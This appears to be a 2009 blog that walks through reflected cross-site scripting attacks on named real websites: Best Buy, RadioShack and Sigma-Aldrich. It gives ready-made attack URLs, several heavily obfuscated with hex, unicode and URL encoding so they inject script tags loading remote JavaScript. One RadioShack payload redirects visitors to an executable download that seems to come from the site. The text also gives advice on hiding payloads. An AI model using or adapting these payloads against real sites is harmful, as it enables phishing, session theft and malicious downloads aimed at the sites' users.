Unescape Unicode + Partial Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2Cnull%2C%22/%22%2CtriggerParms%5B%22domain%22%5D%29%3Bdocument.write%28unescape%28%27%25u003c%25u0073%25u0063%25u0072%25u0069%25u0070%25u0074%25u0020%25u0074%25u0079%25u0070%25u0065%25u003d%25u0022%25u0074%25u0065%25u0078%25u0074%25u002f%25u006a%25u0061%25u0076%25u0061%25u0073%25u0063%25u0072%25u0069%25u0070%25u0074%25u0022%25u0020%25u0073%25u0072%25u0063%25u003d%25u0022%25u0068%25u0074%25u0074%25u0070%25u003a%25u002f%25u002f%25u0078%25u0073%25u0073%25u002d%25u006a%25u0061%25u0076%25u0061%25u0073%25u0063%25u0072%25u0069%25u0070%25u0074%25u002d%25u006f%25u0062%25u0066%25u0075%25u0073%25u0063%25u0061%25u0074%25u006f%25u0072%25u002e%25u0067%25u006f%25u006f%25u0067%25u006c%25u0065%25u0063%25u006f%25u0064%25u0065%25u002e%25u0063%25u006f%25u006d%25u002f%25u0073%25u0076%25u006e%25u002f%25u0074%25u0072%25u0075%25u006e%25u006b%25u002f%25u0058%25u0053%25u0053%25u004a%25u0061%25u0076%25u0061%25u0073%25u0063%25u0072%25u0069%25u0070%25u0074%25u004f%25u0062%25u0066%25u0075%25u0073%25u0063%25u0061%25u0074%25u006f%25u0072%25u002f%25u0074%25u0065%25u0073%25u0074%25u002e%25u006a%25u0073%25u0022%25u003e%25u003c%25u002f%25u0073%25u0063%25u0072%25u0069%25u0070%25u0074%25u003e%27%29%29%3Bvar%20x%3Dnew%20Array%28%22&type=category
Unescape Unicode + Full Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2c%6e%75%6c%6c%2c%22%2f%22%2c%74%72%69%67%67%65%72%50%61%72%6d%73%5b%22%64%6f%6d%61%69%6e%22%5d%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%25%75%30%30%33%63%25%75%30%30%37%33%25%75%30%30%36%33%25%75%30%30%37%32%25%75%30%30%36%39%25%75%30%30%37%30%25%75%30%30%37%34%25%75%30%30%32%30%25%75%30%30%37%34%25%75%30%30%37%39%25%75%30%30%37%30%25%75%30%30%36%35%25%75%30%30%33%64%25%75%30%30%32%32%25%75%30%30%37%34%25%75%30%30%36%35%25%75%30%30%37%38%25%75%30%30%37%34%25%75%30%30%32%66%25%75%30%30%36%61%25%75%30%30%36%31%25%75%30%30%37%36%25%75%30%30%36%31%25%75%30%30%37%33%25%75%30%30%36%33%25%75%30%30%37%32%25%75%30%30%36%39%25%75%30%30%37%30%25%75%30%30%37%34%25%75%30%30%32%32%25%75%30%30%32%30%25%75%30%30%37%33%25%75%30%30%37%32%25%75%30%30%36%33%25%75%30%30%33%64%25%75%30%30%32%32%25%75%30%30%36%38%25%75%30%30%37%34%25%75%30%30%37%34%25%75%30%30%37%30%25%75%30%30%33%61%25%75%30%30%32%66%25%75%30%30%32%66%25%75%30%30%37%38%25%75%30%30%37%33%25%75%30%30%37%33%25%75%30%30%32%64%25%75%30%30%36%61%25%75%30%30%36%31%25%75%30%30%37%36%25%75%30%30%36%31%25%75%30%30%37%33%25%75%30%30%36%33%25%75%30%30%37%32%25%75%30%30%36%39%25%75%30%30%37%30%25%75%30%30%37%34%25%75%30%30%32%64%25%75%30%30%36%66%25%75%30%30%36%32%25%75%30%30%36%36%25%75%30%30%37%35%25%75%30%30%37%33%25%75%30%30%36%33%25%75%30%30%36%31%25%75%30%30%37%34%25%75%30%30%36%66%25%75%30%30%37%32%25%75%30%30%32%65%25%75%30%30%36%37%25%75%30%30%36%66%25%75%30%30%36%66%25%75%30%30%36%37%25%75%30%30%36%63%25%75%30%30%36%35%25%75%30%30%36%33%25%75%30%30%36%66%25%75%30%30%36%34%25%75%30%30%36%35%25%75%30%30%32%65%25%75%30%30%36%33%25%75%30%30%36%66%25%75%30%30%36%64%25%75%30%30%32%66%25%75%30%30%37%33%25%75%30%30%37%36%25%75%30%30%36%65%25%75%30%30%32%66%25%75%30%30%37%34%25%75%30%30%37%32%25%75%30%30%37%35%25%75%30%30%36%65%25%75%30%30%36%62%25%75%30%30%32%66%25%75%30%30%35%38%25%75%30%30%35%33%25%75%30%30%35%33%25%75%30%30%34%61%25%75%30%30%36%31%25%75%30%30%37%36%25%75%30%30%36%31%25%75%30%30%37%33%25%75%30%30%36%33%25%75%30%30%37%32%25%75%30%30%36%39%25%75%30%30%37%30%25%75%30%30%37%34%25%75%30%30%34%66%25%75%30%30%36%32%25%75%30%30%36%36%25%75%30%30%37%35%25%75%30%30%37%33%25%75%30%30%36%33%25%75%30%30%36%31%25%75%30%30%37%34%25%75%30%30%36%66%25%75%30%30%37%32%25%75%30%30%32%66%25%75%30%30%37%34%25%75%30%30%36%35%25%75%30%30%37%33%25%75%30%30%37%34%25%75%30%30%32%65%25%75%30%30%36%61%25%75%30%30%37%33%25%75%30%30%32%32%25%75%30%30%33%65%25%75%30%30%33%63%25%75%30%30%32%66%25%75%30%30%37%33%25%75%30%30%36%33%25%75%30%30%37%32%25%75%30%30%36%39%25%75%30%30%37%30%25%75%30%30%37%34%25%75%30%30%33%65%27%29%29%3b%76%61%72%20%78%3d%6e%65%77%20%41%72%72%61%79%28%22&type=category
Hex String	http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);document.write('\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x78\x73\x73\x2d\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x2d\x6f\x62\x66\x75\x73\x63\x61\x74\x6f\x72\x2e\x67\x6f\x6f\x67\x6c\x65\x63\x6f\x64\x65\x2e\x63\x6f\x6d\x2f\x73\x76\x6e\x2f\x74\x72\x75\x6e\x6b\x2f\x58\x53\x53\x4a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x4f\x62\x66\x75\x73\x63\x61\x74\x6f\x72\x2f\x74\x65\x73\x74\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');var x=new Array("&type=category
Hext String + Partial Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2Cnull%2C%22/%22%2CtriggerParms%5B%22domain%22%5D%29%3Bdocument.write%28%27%5Cx3c%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx20%5Cx74%5Cx79%5Cx70%5Cx65%5Cx3d%5Cx22%5Cx74%5Cx65%5Cx78%5Cx74%5Cx2f%5Cx6a%5Cx61%5Cx76%5Cx61%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx22%5Cx20%5Cx73%5Cx72%5Cx63%5Cx3d%5Cx22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx3a%5Cx2f%5Cx2f%5Cx78%5Cx73%5Cx73%5Cx2d%5Cx6a%5Cx61%5Cx76%5Cx61%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx2d%5Cx6f%5Cx62%5Cx66%5Cx75%5Cx73%5Cx63%5Cx61%5Cx74%5Cx6f%5Cx72%5Cx2e%5Cx67%5Cx6f%5Cx6f%5Cx67%5Cx6c%5Cx65%5Cx63%5Cx6f%5Cx64%5Cx65%5Cx2e%5Cx63%5Cx6f%5Cx6d%5Cx2f%5Cx73%5Cx76%5Cx6e%5Cx2f%5Cx74%5Cx72%5Cx75%5Cx6e%5Cx6b%5Cx2f%5Cx58%5Cx53%5Cx53%5Cx4a%5Cx61%5Cx76%5Cx61%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx4f%5Cx62%5Cx66%5Cx75%5Cx73%5Cx63%5Cx61%5Cx74%5Cx6f%5Cx72%5Cx2f%5Cx74%5Cx65%5Cx73%5Cx74%5Cx2e%5Cx6a%5Cx73%5Cx22%5Cx3e%5Cx3c%5Cx2f%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx3e%27%29%3Bvar%20x%3Dnew%20Array%28%22&type=category
Hex String + Full Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2c%6e%75%6c%6c%2c%22%2f%22%2c%74%72%69%67%67%65%72%50%61%72%6d%73%5b%22%64%6f%6d%61%69%6e%22%5d%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%5c%78%33%63%5c%78%37%33%5c%78%36%33%5c%78%37%32%5c%78%36%39%5c%78%37%30%5c%78%37%34%5c%78%32%30%5c%78%37%34%5c%78%37%39%5c%78%37%30%5c%78%36%35%5c%78%33%64%5c%78%32%32%5c%78%37%34%5c%78%36%35%5c%78%37%38%5c%78%37%34%5c%78%32%66%5c%78%36%61%5c%78%36%31%5c%78%37%36%5c%78%36%31%5c%78%37%33%5c%78%36%33%5c%78%37%32%5c%78%36%39%5c%78%37%30%5c%78%37%34%5c%78%32%32%5c%78%32%30%5c%78%37%33%5c%78%37%32%5c%78%36%33%5c%78%33%64%5c%78%32%32%5c%78%36%38%5c%78%37%34%5c%78%37%34%5c%78%37%30%5c%78%33%61%5c%78%32%66%5c%78%32%66%5c%78%37%38%5c%78%37%33%5c%78%37%33%5c%78%32%64%5c%78%36%61%5c%78%36%31%5c%78%37%36%5c%78%36%31%5c%78%37%33%5c%78%36%33%5c%78%37%32%5c%78%36%39%5c%78%37%30%5c%78%37%34%5c%78%32%64%5c%78%36%66%5c%78%36%32%5c%78%36%36%5c%78%37%35%5c%78%37%33%5c%78%36%33%5c%78%36%31%5c%78%37%34%5c%78%36%66%5c%78%37%32%5c%78%32%65%5c%78%36%37%5c%78%36%66%5c%78%36%66%5c%78%36%37%5c%78%36%63%5c%78%36%35%5c%78%36%33%5c%78%36%66%5c%78%36%34%5c%78%36%35%5c%78%32%65%5c%78%36%33%5c%78%36%66%5c%78%36%64%5c%78%32%66%5c%78%37%33%5c%78%37%36%5c%78%36%65%5c%78%32%66%5c%78%37%34%5c%78%37%32%5c%78%37%35%5c%78%36%65%5c%78%36%62%5c%78%32%66%5c%78%35%38%5c%78%35%33%5c%78%35%33%5c%78%34%61%5c%78%36%31%5c%78%37%36%5c%78%36%31%5c%78%37%33%5c%78%36%33%5c%78%37%32%5c%78%36%39%5c%78%37%30%5c%78%37%34%5c%78%34%66%5c%78%36%32%5c%78%36%36%5c%78%37%35%5c%78%37%33%5c%78%36%33%5c%78%36%31%5c%78%37%34%5c%78%36%66%5c%78%37%32%5c%78%32%66%5c%78%37%34%5c%78%36%35%5c%78%37%33%5c%78%37%34%5c%78%32%65%5c%78%36%61%5c%78%37%33%5c%78%32%32%5c%78%33%65%5c%78%33%63%5c%78%32%66%5c%78%37%33%5c%78%36%33%5c%78%37%32%5c%78%36%39%5c%78%37%30%5c%78%37%34%5c%78%33%65%27%29%3b%76%61%72%20%78%3d%6e%65%77%20%41%72%72%61%79%28%22&type=category

And here we are with several links containing obfuscated JavaScript that will inject a script tag. Testing should reveal which links work best; generally the obfuscation methods ending with a partial URL encode are the most compatible.

XSS JavaScript Obfuscator

Url Prefix	Url Suffix
Attack Vector Prefix	Attack Vector Suffix
Code	Encoded Javascript
Partial Url Encode	Complete Url Encode
Decode Method String.fromCharCode call unescape partial encode call unescape full encode call unescape full unicode encode call hex string	Decode Return Call document.write eval

Insecure JavaScript - RadioShack.com

2009-05-05T18:52:00.000-07:00

Today we're going to examine www.radioshack.com. As with many XSS exploits, this will be short and simple. Looking at the site you'll notice that they have a product search. Just as before we'll test this using our special string, testA.,:;\'"<>()[]{}

Without viewing the source it's apparent that our test string has been significantly altered. ,:;\'"<>()[]{} has been completely removed from our search, but how much of this happened client-side? Lets take a look at the current URL.

http://www.radioshack.com/search/noResults.jsp?useCatForBc=1&bcLinkAll=1&sr=1&kw=testa.&origkw=testA.,:;\'%26quot;%26lt;%26gt;()[]{}&kwCatId=

By changing the kw field to our original search string we can create our own URL and see how reliant on client-side validation the site is. Our new URL should look like this:

http://www.radioshack.com/search/noResults.jsp?useCatForBc=1&bcLinkAll=1&sr=1&kw=testA.,:;\'"<>()[]{}&origkw=testA.,:;\'%26quot;%26lt;%26gt;()[]{}&kwCatId=

Things certainly look better, but it's still possible the search is secure. To find out, we'll have to view the source of the page. Looking at the first match for testA it's apparent that our search string is encoded.


    <input type="text" style="font-size:10px;width:164px;" name="kw" id="kw" value="testA.,:;\'&quot;&lt;&gt;()[]{}">

This complicates things, but an attack is still possible. Lets look at some of the other results. Near the bottom of the page is the following block of javascript:


    var s_account='gsicrsk';
    var s_server='www.radioshack.com';
    var s_hier1='';
    var s_eVar19='67340647933';
    var s_channel='Home';
    var s_eVar3='testA.,:;\'&quot;&lt;&gt;()[]{}';
    var s_pageName='Search (internal)';

Because we have access to the single quote character, we can easily inject code here. Consider what would happen if we passed in ';var x=' as the keyword.


    var s_account='gsicrsk';
    var s_server='www.radioshack.com';
    var s_hier1='';
    var s_eVar19='67340647933';
    var s_channel='Home';
    var s_eVar3='';var x='';
    var s_pageName='Search (internal)';

At this point we can write any javascript we want between the ; and v provided we don't use any of the encoded characters. As an example of what can be done with this, we can craft a URL that redirects to a download making it seem as is if it's coming from www.radioshack.com.

http://www.radioshack.com/search/noResults.jsp?kw=';window.location='http://download.winzip.com/wzd/winzip120.exe';var x='

And again we can URL encode the payload.

http://www.radioshack.com/search/noResults.jsp?kw=%27%3B%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%64%6F%77%6E%6C%6F%61%64%2E%77%69%6E%7A%69%70%2E%63%6F%6D%2F%77%7A%64%2F%77%69%6E%7A%69%70%31%32%30%2E%65%78%65%27%3B%76%61%72%20%78%3D%27

XSS 101 - SigmaAldrich.com

2009-05-03T22:21:00.000-07:00

The target of my first post will be www.sigmaaldrich.com, the website of international chemical supplier Sigma-Aldrich. First take a look at the website itself and look for an input whose data may be displayed on the page after postback.

Fortunately for us, sigmaaldrich.com has a search option. Because search engines generally accept a wide array of characters and display some form of the original search string on the results page, they are an excellent attack vector for cross-site scripting. To see what sort of encoding the search goes through, we're going to use a special string:

testA.,:;\'"<>()[]{}

After searching for the string, view the source of the results page and search for testA within the code. The first result should look like the javascript below.


cmCreatePageviewTag("Result Page: Product Results","SS6", "Keyword (fulltext)|testA.,:;\'"<>()[]{}|", "2");

Here we can see an unencoded, exact match of our search within a javascript string. This means we have free reign to terminate the string (as was already done with the test string), finish the function call, and inject our own code. However, with access to less than and greater than characters, we should look further to see what else can be done. The next search string match is even more promising.


That Match Your Search for "testA.,:;\'"<>()[]{}"

We're still free of encoding, and with this instance of the search string we can easily inject an HTML script tag referencing a javascript file on another server. Our script, for the sake of testing purposes, only contains an alert. The code that will be injected is shown below.


<script type='text/javascript' src='http://www.yourdomain.com/test.js'></script>

Note that the address in this sample doesn't actually point to anything; you'll need to replace it with your own.

Next, in the URL of the results page we replace the search string with the code we want to inject. The result should look like this:


http://www.sigmaaldrich.com/catalog/Lookup.do?N5=Keyword%20(fulltext)&N3=mode+matchpartialmax&N4=<script type='text/javascript' src='http://www.yourdomain.com/test.js'></script>

When we navigate to this URL, an alert should pop up letting us know that our off site code has been successfully run.

To better hide the payload and enhance browser compatibility we can URL encode the javascript resulting in a link that would look similar to this:


http://www.sigmaaldrich.com/catalog/Lookup.do?N5=Keyword%20(fulltext)&N3=%3C%73%63%72%69%70%74%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%79%6F%75%72%64%6F%6D%61%69%6E%2E%63%6F%6D%2F%74%65%73%74%2E%6A%73%27%3E%3C%2F%73%63%72%69%70%74%3E

And that's it. XSS is a simple, powerful reminder to properly encode all user entered data.